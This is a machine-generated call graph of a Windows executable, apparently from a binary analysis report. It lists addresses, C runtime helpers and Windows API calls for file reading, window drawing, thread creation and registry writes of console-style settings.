___free_lconv_mon 14 API calls 10037->10038 10038->10004 10040 1b47d1 10039->10040 10041 1b46f4 10040->10041 10042 1b36c3 ___free_lconv_mon 14 API calls 10040->10042 10041->10008 10042->10040 10043->9928 10045 1b39da ___std_exception_copy 10044->10045 10048 1b3922 10045->10048 10047 1b39f2 ___std_exception_copy 10047->9822 10049 1b3939 10048->10049 10050 1b3932 10048->10050 10054 1b3947 10049->10054 10061 1b399f 10049->10061 10057 1b14f0 GetLastError 10050->10057 10053 1b396e 10053->10054 10064 1b37a6 IsProcessorFeaturePresent 10053->10064 10054->10047 10056 1b399e 10058 1b1509 10057->10058 10068 1b27ee 10058->10068 10062 1b39aa GetLastError SetLastError 10061->10062 10063 1b39c3 10061->10063 10062->10053 10063->10053 10065 1b37b2 10064->10065 10090 1b37da 10065->10090 10069 1b2801 10068->10069 10073 1b2807 10068->10073 10071 1b21cf _unexpected 6 API calls 10069->10071 10070 1b220e _unexpected 6 API calls 10072 1b2821 10070->10072 10071->10073 10074 1b1525 SetLastError 10072->10074 10075 1b4871 _unexpected 14 API calls 10072->10075 10073->10070 10073->10074 10074->10049 10076 1b2831 10075->10076 10077 1b2839 10076->10077 10078 1b284e 10076->10078 10079 1b220e _unexpected 6 API calls 10077->10079 10080 1b220e _unexpected 6 API calls 10078->10080 10082 1b2845 10079->10082 10081 1b285a 10080->10081 10083 1b285e 10081->10083 10084 1b286d 10081->10084 10087 1b36c3 ___free_lconv_mon 14 API calls 10082->10087 10085 1b220e _unexpected 6 API calls 10083->10085 10086 1b28fd _unexpected 14 API calls 10084->10086 10085->10082 10088 1b2878 10086->10088 10087->10074 10089 1b36c3 ___free_lconv_mon 14 API calls 10088->10089 10089->10074 10091 1b37f6 __FrameHandler3::FrameUnwindToState 10090->10091 10092 1b3822 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10091->10092 10095 1b38f3 __FrameHandler3::FrameUnwindToState 10092->10095 10094 1b37c7 GetCurrentProcess TerminateProcess 10094->10056 10096 1adb25 10095->10096 10097 1adb2e IsProcessorFeaturePresent 10096->10097 10098 1adb2d 10096->10098 10100 1adb48 10097->10100 10098->10094 10103 1adc2d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10100->10103 10102 1adc2b 10102->10094 10103->10102 11547 1b2891 11548 1b289c 11547->11548 11552 1b28ac 11547->11552 11553 1b2996 11548->11553 11551 1b36c3 ___free_lconv_mon 14 API calls 11551->11552 11554 1b29ab 11553->11554 11555 1b29b1 11553->11555 11556 1b36c3 ___free_lconv_mon 14 API calls 11554->11556 11557 1b36c3 ___free_lconv_mon 14 API calls 11555->11557 11556->11555 11558 1b29bd 11557->11558 11559 1b36c3 ___free_lconv_mon 14 API calls 11558->11559 11560 1b29c8 11559->11560 11561 1b36c3 ___free_lconv_mon 14 API calls 11560->11561 11562 1b29d3 11561->11562 11563 1b36c3 ___free_lconv_mon 14 API calls 11562->11563 11564 1b29de 11563->11564 11565 1b36c3 ___free_lconv_mon 14 API calls 11564->11565 11566 1b29e9 11565->11566 11567 1b36c3 ___free_lconv_mon 14 API calls 11566->11567 11568 1b29f4 11567->11568 11569 1b36c3 ___free_lconv_mon 14 API calls 11568->11569 11570 1b29ff 11569->11570 11571 1b36c3 ___free_lconv_mon 14 API calls 11570->11571 11572 1b2a0a 11571->11572 11573 1b36c3 ___free_lconv_mon 14 API calls 11572->11573 11574 1b2a18 11573->11574 11579 1b2b0f 11574->11579 11580 1b2b1b __FrameHandler3::FrameUnwindToState 11579->11580 11595 1b255d EnterCriticalSection 11580->11595 11582 1b2b4f 11596 1b2b6e 11582->11596 11585 1b2b25 11585->11582 11586 1b36c3 ___free_lconv_mon 14 API calls 11585->11586 11586->11582 11587 1b2b7a 11588 1b2b86 __FrameHandler3::FrameUnwindToState 11587->11588 11600 1b255d EnterCriticalSection 11588->11600 11590 1b2b90 11591 1b28b2 _unexpected 14 API calls 11590->11591 11592 1b2ba3 11591->11592 11601 1b2bc3 11592->11601 11595->11585 11599 1b2574 LeaveCriticalSection 11596->11599 11598 1b2a3e 11598->11587 11599->11598 11600->11590 11604 1b2574 LeaveCriticalSection 11601->11604 11603 1b28a4 11603->11551 11604->11603 10104 1ad1b0 10105 1ad1bc __FrameHandler3::FrameUnwindToState 10104->10105 10130 1ad45b 10105->10130 10107 1ad316 10194 1ad72c IsProcessorFeaturePresent 10107->10194 10109 1ad1c3 10109->10107 10119 1ad1ed ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 10109->10119 10110 1ad31d 10198 1aff5a 10110->10198 10115 1ad20c 10116 1ad28d 10141 1ad6a8 10116->10141 10118 1ad293 10145 1a18d0 10118->10145 10119->10115 10119->10116 10177 1affa4 10119->10177 10125 1ad2b3 10126 1ad2bc 10125->10126 10185 1aff86 10125->10185 10188 1ad494 10126->10188 10131 1ad464 10130->10131 10204 1ad945 IsProcessorFeaturePresent 10131->10204 10135 1ad475 10136 1ad479 10135->10136 10214 1afe57 10135->10214 10136->10109 10139 1ad490 10139->10109 10339 1afc30 10141->10339 10144 1ad6ce 10144->10118 10146 1a1932 __FrameHandler3::FrameUnwindToState ___std_exception_copy 10145->10146 10147 1a1966 CreateFileW GetFileSize VirtualAlloc ReadFile 10146->10147 10175 1a193f 10146->10175 10148 1a1a20 EnumSystemCodePagesW 10147->10148 10341 1b0f4d 10148->10341 10153 1a1e82 10153->10175 10344 1a2080 10153->10344 10154 1a1b5b __FrameHandler3::FrameUnwindToState 10154->10153 10154->10175 10176 1b1341 51 API calls 10154->10176 10156 1a1ee1 10157 1a1f08 GetStdHandle GetStdHandle 10156->10157 10158 1a1fa4 10156->10158 10156->10175 10160 1a1f3f 10157->10160 10358 1a23e0 GetACP TranslateCharsetInfo 10158->10358 10163 1a1f90 10160->10163 10348 1a22b0 10160->10348 10385 1a2980 10163->10385 10165 1a1fca GetStartupInfoW 10168 1a1fe7 10165->10168 10166 1a1f84 10166->10175 10167 1a1f6a 10354 1a2340 10167->10354 10369 1a2750 10168->10369 10183 1ad6d9 GetModuleHandleW 10175->10183 10176->10154 10178 1affba __FrameHandler3::FrameUnwindToState _unexpected 10177->10178 10178->10116 10726 1b25ec GetLastError 10178->10726 10184 1ad2af 10183->10184 10184->10110 10184->10125 10829 1b00f1 10185->10829 10189 1ad4a0 10188->10189 10193 1ad2c4 10189->10193 10904 1afe69 10189->10904 10191 1ad4ae 10192 1ade6e ___scrt_uninitialize_crt 7 API calls 10191->10192 10192->10193 10193->10115 10195 1ad742 __FrameHandler3::FrameUnwindToState 10194->10195 10196 1ad7ed IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10195->10196 10197 1ad838 __FrameHandler3::FrameUnwindToState 10196->10197 10197->10110 10199 1b00f1 __FrameHandler3::FrameUnwindToState 23 API calls 10198->10199 10200 1ad323 10199->10200 10201 1aff70 10200->10201 10202 1b00f1 __FrameHandler3::FrameUnwindToState 23 API calls 10201->10202 10203 1ad32b 10202->10203 10205 1ad470 10204->10205 10206 1ade4f 10205->10206 10223 1b1da7 10206->10223 10209 1ade58 10209->10135 10211 1ade60 10212 1ade6b 10211->10212 10237 1b1de3 10211->10237 10212->10135 10277 1b36fd 10214->10277 10217 1ade6e 10218 1ade81 10217->10218 10219 1ade77 10217->10219 10218->10136 10220 1b1c53 ___vcrt_uninitialize_ptd 6 API calls 10219->10220 10221 1ade7c 10220->10221 10222 1b1de3 ___vcrt_uninitialize_locks DeleteCriticalSection 10221->10222 10222->10218 10225 1b1db0 10223->10225 10226 1b1dd9 10225->10226 10227 1ade54 10225->10227 10241 1b603f 10225->10241 10228 1b1de3 ___vcrt_uninitialize_locks DeleteCriticalSection 10226->10228 10227->10209 10229 1b1c20 10227->10229 10228->10227 10258 1b5f50 10229->10258 10234 1b1c50 10234->10211 10236 1b1c35 10236->10211 10238 1b1e0d 10237->10238 10239 1b1dee 10237->10239 10238->10209 10240 1b1df8 DeleteCriticalSection 10239->10240 10240->10238 10240->10240 10246 1b60d1 10241->10246 10244 1b6077 InitializeCriticalSectionAndSpinCount 10245 1b6062 10244->10245 10245->10225 10247 1b6059 10246->10247 10248 1b60f2 10246->10248 10247->10244 10247->10245 10248->10247 10250 1b615a GetProcAddress 10248->10250 10251 1b614b 10248->10251 10253 1b6086 LoadLibraryExW 10248->10253 10250->10247 10251->10250 10252 1b6153 FreeLibrary 10251->10252 10252->10250 10254 1b60cd 10253->10254 10255 1b609d GetLastError 10253->10255 10254->10248 10255->10254 10256 1b60a8 ___vcrt_FlsGetValue 10255->10256 10256->10254 10257 1b60be LoadLibraryExW 10256->10257 10257->10248 10259 1b60d1 ___vcrt_FlsGetValue 5 API calls 10258->10259 10260 1b5f6a 10259->10260 10261 1b5f83 TlsAlloc 10260->10261 10262 1b1c2a 10260->10262 10262->10236 10263 1b6001 10262->10263 10264 1b60d1 ___vcrt_FlsGetValue 5 API calls 10263->10264 10265 1b601b 10264->10265 10266 1b6036 TlsSetValue 10265->10266 10267 1b1c43 10265->10267 10266->10267 10267->10234 10268 1b1c53 10267->10268 10269 1b1c5d 10268->10269 10271 1b1c63 10268->10271 10272 1b5f8b 10269->10272 10271->10236 10273 1b60d1 ___vcrt_FlsGetValue 5 API calls 10272->10273 10274 1b5fa5 10273->10274 10275 1b5fbd TlsFree 10274->10275 10276 1b5fb1 10274->10276 10275->10276 10276->10271 10278 1b370d 10277->10278 10279 1ad482 10277->10279 10278->10279 10281 1b2bcf 10278->10281 10279->10139 10279->10217 10282 1b2bdb __FrameHandler3::FrameUnwindToState 10281->10282 10293 1b255d EnterCriticalSection 10282->10293 10284 1b2be2 10294 1b5d10 10284->10294 10292 1b2c00 10318 1b2c26 10292->10318 10293->10284 10295 1b5d1c __FrameHandler3::FrameUnwindToState 10294->10295 10296 1b5d46 10295->10296 10297 1b5d25 10295->10297 10321 1b255d EnterCriticalSection 10296->10321 10298 1b47e4 ___free_lconv_mon 14 API calls 10297->10298 10300 1b5d2a 10298->10300 10301 1b3796 ___std_exception_copy 29 API calls 10300->10301 10302 1b2bf1 10301->10302 10302->10292 10307 1b2c5b GetStartupInfoW 10302->10307 10303 1b5d7e 10329 1b5da5 10303->10329 10305 1b5d52 10305->10303 10322 1b5c60 10305->10322 10308 1b2c78 10307->10308 10309 1b2bfb 10307->10309 10308->10309 10310 1b5d10 30 API calls 10308->10310 10313 1b2d11 10309->10313 10311 1b2ca0 10310->10311 10311->10309 10312 1b2cd0 GetFileType 10311->10312 10312->10311 10314 1b2d18 10313->10314 10315 1b2d5b GetStdHandle 10314->10315 10316 1b2dbd 10314->10316 10317 1b2d6e GetFileType 10314->10317 10315->10314 10316->10292 10317->10314 10338 1b2574 LeaveCriticalSection 10318->10338 10320 1b2c11 10320->10278 10321->10305 10323 1b4871 _unexpected 14 API calls 10322->10323 10326 1b5c72 10323->10326 10324 1b5c7f 10325 1b36c3 ___free_lconv_mon 14 API calls 10324->10325 10327 1b5cd4 10325->10327 10326->10324 10332 1b2250 10326->10332 10327->10305 10337 1b2574 LeaveCriticalSection 10329->10337 10331 1b5dac 10331->10302 10333 1b2434 _unexpected 5 API calls 10332->10333 10334 1b226c 10333->10334 10335 1b228a InitializeCriticalSectionAndSpinCount 10334->10335 10336 1b2275 10334->10336 10335->10336 10336->10326 10337->10331 10338->10320 10340 1ad6bb GetStartupInfoW 10339->10340 10340->10144 10342 1b36c3 ___free_lconv_mon 14 API calls 10341->10342 10343 1a1b01 GetOEMCP 10342->10343 10343->10154 10345 1a20a6 __FrameHandler3::FrameUnwindToState ___std_exception_copy 10344->10345 10346 1b0f4d ___std_exception_destroy 14 API calls 10345->10346 10347 1a20b2 CatchIt 10345->10347 10346->10347 10347->10156 10349 1a22c6 WerSetFlags 10348->10349 10353 1a1f5a 10348->10353 10398 1a7930 10349->10398 10353->10163 10353->10167 10355 1a1f78 10354->10355 10356 1a2365 10354->10356 10355->10163 10355->10166 10356->10355 10357 1a2375 CreateThread 10356->10357 10357->10355 10359 1a1fb2 10358->10359 10360 1a2437 GetStartupInfoW 10358->10360 10359->10165 10359->10166 10366 1a2468 ___std_exception_copy 10360->10366 10362 1a2575 6 API calls 10362->10359 10364 1a26fe 10362->10364 10365 1a271e 10364->10365 10422 1a4940 10364->10422 10428 1a4ab0 10365->10428 10366->10359 10419 1a3370 10366->10419 10370 1a2773 ___std_exception_copy CatchIt 10369->10370 10371 1b0f4d ___std_exception_destroy 14 API calls 10370->10371 10374 1a2003 ShowWindow 10370->10374 10372 1a27d2 10371->10372 10373 1a2933 10372->10373 10376 1a7480 4 API calls 10372->10376 10373->10374 10375 1a2946 SetWindowTextW 10373->10375 10374->10163 10375->10374 10377 1a280b 10376->10377 10378 1a282e WideCharToMultiByte 10377->10378 10381 1a288c 10378->10381 10379 1a2908 10380 1a7480 4 API calls 10379->10380 10382 1a2925 10380->10382 10381->10379 10383 1a28c4 WideCharToMultiByte 10381->10383 10384 1a73a0 4 API calls 10382->10384 10383->10379 10384->10373 10386 1a29a5 CreateEventW 10385->10386 10388 1a29e7 10385->10388 10386->10388 10397 1a29db 10386->10397 10388->10397 10718 1a8c20 10388->10718 10389 1a2b28 WaitForMultipleObjects 10391 1a2a6b 10389->10391 10390 1a2af0 MsgWaitForMultipleObjects 10390->10391 10391->10389 10391->10390 10392 1a2b69 PeekMessageW 10391->10392 10393 1a2bf6 EnterCriticalSection 10391->10393 10395 1a2bb9 DispatchMessageW 10391->10395 10391->10397 10392->10391 10722 1a8c90 10393->10722 10395->10392 10397->10175 10399 1a7956 10398->10399 10405 1a7a0a _strlen 10398->10405 10400 1a7a12 10399->10400 10403 1a7965 _strlen 10399->10403 10402 1a7480 4 API calls 10400->10402 10401 1a22ff 10407 1a7480 10401->10407 10402->10405 10404 1a7480 4 API calls 10403->10404 10404->10405 10405->10401 10406 1a7480 4 API calls 10405->10406 10406->10401 10408 1a749a 10407->10408 10410 1a74aa CatchIt 10407->10410 10409 1a74d1 10408->10409 10408->10410 10414 1a75b0 10408->10414 10409->10410 10412 1a7546 WriteFile 10409->10412 10410->10353 10412->10410 10413 1a7587 GetLastError 10412->10413 10413->10410 10415 1a75ca 10414->10415 10418 1a75da 10414->10418 10416 1a75df WriteFile 10415->10416 10415->10418 10417 1a7629 GetLastError 10416->10417 10416->10418 10417->10418 10418->10409 10420 1a3399 __FrameHandler3::FrameUnwindToState CatchIt 10419->10420 10421 1a33bb GetDpiForSystem MulDiv GetDpiForSystem MulDiv 10420->10421 10421->10362 10423 1a496e __FrameHandler3::FrameUnwindToState 10422->10423 10424 1a49a6 EnumFontFamiliesExW 10423->10424 10425 1a49e9 CatchIt 10423->10425 10424->10423 10424->10425 10440 1ac3b0 10425->10440 10427 1a4a9f 10427->10365 10432 1a4ad3 __FrameHandler3::FrameUnwindToState ___std_exception_copy 10428->10432 10429 1a4cad CatchIt 10431 1a4ed6 10429->10431 10488 1a2ce0 10429->10488 10492 1a8e70 10431->10492 10432->10429 10435 1a4c9c 10432->10435 10437 1b0f4d ___std_exception_destroy 14 API calls 10432->10437 10438 1b0f4d ___std_exception_destroy 14 API calls 10435->10438 10437->10432 10438->10429 10441 1ac3c6 RegCreateKeyW 10440->10441 10442 1ac424 10440->10442 10443 1ac3f1 10441->10443 10445 1ac3ec RegCloseKey 10441->10445 10444 1ac4c0 28 API calls 10442->10444 10449 1ac4c0 10443->10449 10444->10445 10445->10427 10450 1ac4de 10449->10450 10452 1ac4f6 10449->10452 10451 1a3370 4 API calls 10450->10451 10451->10452 10453 1ac5e1 10452->10453 10455 1ac556 wsprintfW RegSetValueExW 10452->10455 10454 1ac5fd RegSetValueExW 10453->10454 10456 1ac646 10453->10456 10454->10456 10455->10452 10457 1ac662 RegSetValueExW 10456->10457 10458 1ac6ab 10456->10458 10457->10458 10459 1ac6c7 RegSetValueExW 10458->10459 10460 1ac713 10458->10460 10459->10460 10461 1ac74a lstrlenW RegSetValueExW 10460->10461 10462 1ac71d lstrcmpW 10460->10462 10463 1ac7a0 10461->10463 10462->10461 10462->10463 10464 1ac7bc RegSetValueExW 10463->10464 10465 1ac808 10463->10465 10464->10465 10466 1ac836 GetDpiForSystem MulDiv GetDpiForSystem MulDiv RegSetValueExW 10465->10466 10467 1ac8ef 10465->10467 10466->10467 10468 1ac90b RegSetValueExW 10467->10468 10469 1ac957 10467->10469 10468->10469 10470 1ac970 RegSetValueExW 10469->10470 10471 1ac9b9 10469->10471 10470->10471 10472 1ac9d2 RegSetValueExW 10471->10472 10473 1aca1b 10471->10473 10472->10473 10474 1aca34 RegSetValueExW 10473->10474 10475 1aca7d 10473->10475 10474->10475 10476 1aca96 RegSetValueExW 10475->10476 10477 1acadf 10475->10477 10476->10477 10478 1acaf8 RegSetValueExW 10477->10478 10479 1acb41 10477->10479 10478->10479 10480 1acb5a RegSetValueExW 10479->10480 10481 1acba3 10479->10481 10480->10481 10482 1acbcb RegSetValueExW 10481->10482 10483 1acc30 10481->10483 10482->10483 10484 1acc4c RegSetValueExW 10483->10484 10485 1acc95 10483->10485 10484->10485 10486 1accbd RegSetValueExW 10485->10486 10487 1ac40d RegCloseKey 10485->10487 10486->10487 10487->10445 10489 1a2d1e 10488->10489 10533 1a2e20 10489->10533 10493 1a8ef8 10492->10493 10494 1a8eac 10492->10494 10499 1a8f55 GetDC 10493->10499 10512 1a908e 10493->10512 10494->10493 10495 1a8eda IsWindowVisible 10494->10495 10496 1a90af 10494->10496 10495->10493 10495->10496 10498 1a911d GetWindowLongW AdjustWindowRect 10496->10498 10503 1a94bb 10496->10503 10500 1a91cf GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10498->10500 10501 1a9281 ShowScrollBar 10498->10501 10502 1a8f7b CreateCompatibleBitmap ReleaseDC SelectObject 10499->10502 10528 1a4ee4 10499->10528 10504 1a92a8 10500->10504 10501->10504 10505 1a902c SetRect 10502->10505 10506 1a9014 DeleteObject 10502->10506 10509 1a94f7 ScrollWindow SetScrollPos SetScrollPos InvalidateRect 10503->10509 10514 1a95ff 10503->10514 10507 1a936a ShowScrollBar 10504->10507 10508 1a92ba GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 10504->10508 10548 1ab280 10505->10548 10506->10505 10511 1a9391 SetWindowPos SystemParametersInfoW GetSystemMetrics InvalidateRect UpdateWindow 10507->10511 10508->10511 10509->10514 10511->10514 10558 1a6c30 SetRect 10512->10558 10513 1a977f 10516 1a97c4 10513->10516 10560 1ab420 10513->10560 10514->10513 10515 1ab280 18 API calls 10514->10515 10518 1a9720 10515->10518 10519 1a97e2 GetFocus 10516->10519 10525 1a987b 10516->10525 10559 1a6c30 SetRect 10518->10559 10521 1a9816 10519->10521 10519->10525 10523 1a9829 CreateCaret 10521->10523 10524 1a9883 DestroyCaret 10521->10524 10522 1a9741 InvalidateRect UpdateWindow 10522->10513 10569 1aa510 10523->10569 10524->10525 10527 1aa510 3 API calls 10525->10527 10525->10528 10527->10528 10529 1a17c0 10528->10529 10531 1a17d4 10529->10531 10530 1a1832 10530->10359 10531->10530 10574 1a1000 10531->10574 10534 1a2f22 GetDC 10533->10534 10540 1a2e51 10533->10540 10535 1a2f52 CreateFontIndirectW 10534->10535 10547 1a2d33 10534->10547 10536 1a2f98 SelectObject GetTextMetricsW 10535->10536 10537 1a2f6d ReleaseDC 10535->10537 10538 1a2fe7 GetTextFaceW SelectObject ReleaseDC 10536->10538 10537->10547 10539 1b0f4d ___std_exception_destroy 14 API calls 10538->10539 10541 1a3094 ___std_exception_copy CatchIt 10539->10541 10540->10534 10540->10547 10542 1a30d2 GetCPInfo 10541->10542 10543 1a30fa 10542->10543 10544 1a313e 10543->10544 10545 1a3126 DeleteObject 10543->10545 10546 1a316f DeleteObject 10544->10546 10544->10547 10545->10544 10546->10547 10547->10431 10549 1ab2b2 10548->10549 10550 1ab29f ___std_exception_copy 10548->10550 10549->10512 10550->10549 10551 1ab2fa SelectObject 10550->10551 10552 1ab330 10551->10552 10553 1ab3d9 SelectObject 10552->10553 10555 1ab356 SetBkColor SetTextColor 10552->10555 10554 1b0f4d ___std_exception_destroy 14 API calls 10553->10554 10556 1ab402 10554->10556 10555->10552 10557 1b0f4d ___std_exception_destroy 14 API calls 10556->10557 10557->10549 10558->10496 10559->10522 10561 1ab46c 10560->10561 10562 1ab447 GetFocus 10560->10562 10564 1ab47f DeleteObject 10561->10564 10567 1ab497 __FrameHandler3::FrameUnwindToState 10561->10567 10562->10561 10563 1ab466 DestroyCaret 10562->10563 10563->10561 10564->10567 10565 1ab508 10565->10516 10566 1ab603 CreateBitmap 10568 1b0f4d ___std_exception_destroy 14 API calls 10566->10568 10567->10565 10567->10566 10568->10565 10570 1aa548 10569->10570 10571 1aa529 GetFocus 10569->10571 10570->10525 10571->10570 10572 1aa54d 10571->10572 10573 1aa580 SetCaretPos ShowCaret 10572->10573 10573->10570 10575 1a1028 10574->10575 10577 1a101c 10574->10577 10579 1a105e CatchIt 10575->10579 10580 1b0fdc 10575->10580 10577->10530 10579->10577 10593 1a1200 10579->10593 10581 1b5e23 10580->10581 10582 1b5e3b 10581->10582 10583 1b5e30 10581->10583 10585 1b5e43 10582->10585 10591 1b5e4c _unexpected 10582->10591 10610 1b48ce 10583->10610 10588 1b36c3 ___free_lconv_mon 14 API calls 10585->10588 10586 1b5e51 10589 1b47e4 ___free_lconv_mon 14 API calls 10586->10589 10587 1b5e76 HeapReAlloc 10590 1b5e38 10587->10590 10587->10591 10588->10590 10589->10590 10590->10579 10591->10586 10591->10587 10592 1b39ff _unexpected 2 API calls 10591->10592 10592->10591 10594 1a1240 CatchIt 10593->10594 10596 1a126e CatchIt 10594->10596 10617 1a4f00 10594->10617 10595 1a15e4 __FrameHandler3::FrameUnwindToState 10595->10577 10597 1a15d2 10596->10597 10624 1a50a0 10596->10624 10597->10595 10599 1a161b 10597->10599 10600 1a1649 10597->10600 10607 1a1635 10597->10607 10602 1a4f00 16 API calls 10599->10602 10603 1a1678 10600->10603 10645 1a54f0 10600->10645 10602->10607 10649 1a5690 10603->10649 10606 1b0f4d ___std_exception_destroy 14 API calls 10608 1a1778 10606->10608 10607->10606 10609 1b0f4d ___std_exception_destroy 14 API calls 10608->10609 10609->10595 10611 1b490c 10610->10611 10615 1b48dc _unexpected 10610->10615 10612 1b47e4 ___free_lconv_mon 14 API calls 10611->10612 10614 1b490a 10612->10614 10613 1b48f7 RtlAllocateHeap 10613->10614 10613->10615 10614->10590 10615->10611 10615->10613 10616 1b39ff _unexpected 2 API calls 10615->10616 10616->10615 10618 1a4f28 10617->10618 10623 1a4f23 CatchIt 10617->10623 10619 1a4fcd 10618->10619 10620 1a4f35 10618->10620 10622 1a5690 16 API calls 10619->10622 10619->10623 10621 1a5690 16 API calls 10620->10621 10621->10623 10622->10623 10623->10594 10653 1a6c30 SetRect 10624->10653 10626 1a50d8 10628 1a52c8 10626->10628 10654 1a6c80 10626->10654 10631 1a5387 10628->10631 10662 1a6e90 10628->10662 10630 1a54b1 10688 1a73a0 10630->10688 10634 1a545d 10631->10634 10641 1a5472 10631->10641 10668 1a6f40 10631->10668 10632 1a6f40 4 API calls 10632->10630 10676 1a7040 10634->10676 10638 1a5188 10638->10628 10658 1a6d30 10638->10658 10639 1a6d30 8 API calls 10643 1a50fa 10639->10643 10641->10630 10641->10632 10643->10638 10643->10639 10646 1a5516 ___std_exception_copy CatchIt 10645->10646 10648 1a5511 CatchIt 10645->10648 10647 1b0f4d ___std_exception_destroy 14 API calls 10646->10647 10646->10648 10647->10648 10648->10603 10650 1a56c6 10649->10650 10652 1a56ba 10649->10652 10651 1b0fdc 16 API calls 10650->10651 10651->10652 10652->10607 10653->10626 10655 1a6c99 10654->10655 10657 1a6cb6 10654->10657 10656 1a7480 4 API calls 10655->10656 10656->10657 10657->10643 10659 1a6d55 10658->10659 10660 1a6e90 8 API calls 10659->10660 10661 1a6d93 10659->10661 10660->10661 10661->10638 10663 1a6eb9 10662->10663 10664 1a6edd 10663->10664 10665 1a6ef7 SetRect 10663->10665 10666 1a7040 7 API calls 10664->10666 10667 1a6eef 10665->10667 10666->10667 10667->10631 10670 1a6f61 _strlen 10668->10670 10673 1a6fbc 10668->10673 10669 1a6fa8 10704 1a7660 10669->10704 10675 1a7480 4 API calls 10670->10675 10671 1a7480 4 API calls 10671->10673 10673->10669 10673->10671 10675->10669 10678 1a7057 10676->10678 10677 1a7086 10677->10641 10678->10677 10679 1a70b9 10678->10679 10680 1a709d 10678->10680 10679->10677 10682 1a6c80 4 API calls 10679->10682 10713 1a3270 10680->10713 10686 1a70dd 10682->10686 10683 1a71f3 10717 1a6c30 SetRect 10683->10717 10685 1a7660 4 API calls 10685->10686 10686->10683 10686->10685 10687 1a7480 WriteFile GetLastError WriteFile GetLastError 10686->10687 10687->10686 10689 1a54c1 10688->10689 10690 1a73be 10688->10690 10699 1a31b0 10689->10699 10691 1a7448 10690->10691 10692 1a73ce 10690->10692 10693 1a7433 10691->10693 10694 1a6c80 4 API calls 10691->10694 10696 1a7660 4 API calls 10692->10696 10695 1a75b0 2 API calls 10693->10695 10694->10693 10695->10689 10697 1a7403 10696->10697 10697->10693 10698 1a7480 4 API calls 10697->10698 10698->10693 10700 1a31d3 10699->10700 10701 1a31e6 10699->10701 10700->10701 10702 1a3239 PostMessageW 10700->10702 10703 1a3205 SetTimer 10700->10703 10701->10597 10702->10701 10703->10701 10705 1a7681 10704->10705 10706 1a76b9 _strlen 10705->10706 10707 1a784e 10705->10707 10709 1a7717 10705->10709 10712 1a7035 10705->10712 10711 1a7480 4 API calls 10706->10711 10706->10712 10707->10706 10708 1a6c80 4 API calls 10707->10708 10708->10706 10709->10706 10710 1a7480 4 API calls 10709->10710 10710->10706 10711->10712 10712->10634 10714 1a329b 10713->10714 10715 1a31b0 2 API calls 10714->10715 10716 1a3361 10715->10716 10716->10677 10717->10677 10719 1a8c38 10718->10719 10721 1a8c4d 10718->10721 10720 1b0fdc 16 API calls 10719->10720 10720->10721 10721->10391 10724 1a8ca7 10722->10724 10723 1a2c13 LeaveCriticalSection 10723->10391 10723->10397 10724->10723 10725 1a8c20 16 API calls 10724->10725 10725->10724 10727 1b2602 10726->10727 10730 1b2608 10726->10730 10728 1b21cf _unexpected 6 API calls 10727->10728 10728->10730 10729 1b220e _unexpected 6 API calls 10731 1b2624 10729->10731 10730->10729 10752 1b260c SetLastError 10730->10752 10732 1b4871 _unexpected 14 API calls 10731->10732 10731->10752 10734 1b2639 10732->10734 10737 1b2652 10734->10737 10738 1b2641 10734->10738 10735 1b118c 10753 1b1bdc 10735->10753 10736 1b26a1 10739 1b1bdc __FrameHandler3::FrameUnwindToState 48 API calls 10736->10739 10741 1b220e _unexpected 6 API calls 10737->10741 10740 1b220e _unexpected 6 API calls 10738->10740 10742 1b26a6 10739->10742 10743 1b264f 10740->10743 10744 1b265e 10741->10744 10748 1b36c3 ___free_lconv_mon 14 API calls 10743->10748 10745 1b2679 10744->10745 10746 1b2662 10744->10746 10749 1b28fd _unexpected 14 API calls 10745->10749 10747 1b220e _unexpected 6 API calls 10746->10747 10747->10743 10748->10752 10750 1b2684 10749->10750 10751 1b36c3 ___free_lconv_mon 14 API calls 10750->10751 10751->10752 10752->10735 10752->10736 10762 1b3ab5 10753->10762 10755 1b1be1 10755->10753 10757 1b1bf6 IsProcessorFeaturePresent 10755->10757 10758 1aff70 __FrameHandler3::FrameUnwindToState 23 API calls 10755->10758 10759 1b37da __FrameHandler3::FrameUnwindToState 8 API calls 10755->10759 10761 1b11b6 10755->10761 10765 1b3adc 10755->10765 10792 1b1c7c 10755->10792 10757->10755 10758->10755 10759->10755 10806 1b3d39 10762->10806 10766 1b3ae8 __FrameHandler3::FrameUnwindToState 10765->10766 10767 1b273d ___free_lconv_mon 14 API calls 10766->10767 10772 1b3b15 __FrameHandler3::FrameUnwindToState 10766->10772 10775 1b3b0f __FrameHandler3::FrameUnwindToState 10766->10775 10767->10775 10768 1b3b5c 10770 1b47e4 ___free_lconv_mon 14 API calls 10768->10770 10769 1b3b46 10769->10755 10771 1b3b61 10770->10771 10773 1b3796 ___std_exception_copy 29 API calls 10771->10773 10774 1b3b88 10772->10774 10817 1b255d EnterCriticalSection 10772->10817 10773->10769 10778 1b3cbb 10774->10778 10779 1b3bca 10774->10779 10789 1b3bf9 10774->10789 10775->10768 10775->10769 10775->10772 10780 1b3cc6 10778->10780 10822 1b2574 LeaveCriticalSection 10778->10822 10784 1b25ec _unexpected 50 API calls 10779->10784 10779->10789 10783 1aff70 __FrameHandler3::FrameUnwindToState 23 API calls 10780->10783 10785 1b3cce 10783->10785 10786 1b3bee 10784->10786 10788 1b25ec _unexpected 50 API calls 10786->10788 10787 1b25ec _unexpected 50 API calls 10790 1b3c4e 10787->10790 10788->10789 10818 1b3c68 10789->10818 10790->10769 10791 1b25ec _unexpected 50 API calls 10790->10791 10791->10769 10793 1b1c88 GetLastError 10792->10793 10794 1b1c85 10792->10794 10824 1b5fc6 10793->10824 10794->10755 10797 1b1d02 SetLastError 10797->10755 10798 1b6001 ___vcrt_FlsSetValue 6 API calls 10799 1b1cb6 __FrameHandler3::FrameUnwindToState 10798->10799 10800 1b1cde 10799->10800 10802 1b6001 ___vcrt_FlsSetValue 6 API calls 10799->10802 10805 1b1cbc 10799->10805 10801 1b6001 ___vcrt_FlsSetValue 6 API calls 10800->10801 10803 1b1cf2 10800->10803 10801->10803 10802->10800 10804 1b0f4d ___std_exception_destroy 14 API calls 10803->10804 10804->10805 10805->10797 10807 1b3d45 __FrameHandler3::FrameUnwindToState 10806->10807 10812 1b255d EnterCriticalSection 10807->10812 10809 1b3d53 10813 1b3d91 10809->10813 10812->10809 